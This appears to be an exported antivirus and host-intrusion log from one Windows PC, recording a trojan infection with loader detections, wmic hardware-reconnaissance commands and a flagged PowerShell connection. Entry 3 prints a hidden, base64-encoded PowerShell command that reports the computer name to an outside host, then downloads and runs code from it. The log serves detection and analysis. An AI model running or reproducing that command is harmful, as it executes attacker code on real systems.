【1】2024-11-22 01:44:49,Anti-virus,Memory Protection,Malware Trojan/ShellLoader.oh detected, disposed
Detection: Trojan/ShellLoader.oh
Detection ID: 625B67F2839542CF
Virtual address: 0x000000006C2D0000
Mapping size: 1.5MB
Is it fully mapped: yes
Data flow hash: 366d5c98
Result: disposed
Process ID: 13056
Process: C:\Windows\SysWOW64\cmd.exe
Process Command line: C:\Windows\SysWOW64\cmd.exe
Parent Process ID: 12504
Parent: C:\Users\tik\AppData\Roaming\Serverdownload\EASteamProxy.exe
Parent process Command line: C:\Users\tik\AppData\Roaming\Serverdownload\EASteamProxy.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2024-11-22 01:44:17,HIPS,Network Access Control,powershell.exe violated the Firewall Rules, Permitted
Protocol: TCP
Remote address: 104.251.111.203:80
Local address: 192.168.8.100:62588
Operation: Connect
Result: Permitted
Process ID: 13032
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2024-11-22 01:44:11,HIPS,Host Reinforcement,javaw.exe violated Sensitive Action Rules, Permitted
Detection: Hidden PowerShell script executions
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Process command line: powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"
Result: Permitted
Process ID: 4688
Process: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
Process hash: E84749B99EB491E40A62ED2E92E4D7A790D09273
Parent Process ID: 4216
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\install.exe
Parent process Command line: C:\Users\tik\AppData\Roaming\InstallerPDW\install.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2024-11-22 01:43:48,Anti-virus,Behavior-Based Protection,Malicious behavior ADV:Trojan/GenInjector.S!1.1 detected, disposed
Detection: ADV:Trojan/GenInjector.S!1.1
Path: C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com
Result: disposed
Process ID: 1896
Process Command line: C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
Parent Process ID: 4688
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Parent process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2024-11-22 01:43:46,Anti-virus,Behavior-Based Protection,Malicious behavior ADV:Trojan/GenInjector.S!1.1 detected, disposed
Detection: ADV:Trojan/GenInjector.S!1.1
Path: C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com
Result: disposed
Process ID: 12440
Process Command line: C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
Parent Process ID: 4688
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Parent process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2024-11-22 01:43:44,Anti-virus,Behavior-Based Protection,Malicious behavior ADV:Trojan/GenInjector.S!1.1 detected, disposed
Detection: ADV:Trojan/GenInjector.S!1.1
Path: C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com
Result: disposed
Process ID: 10860
Process Command line: C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
Parent Process ID: 4688
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Parent process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>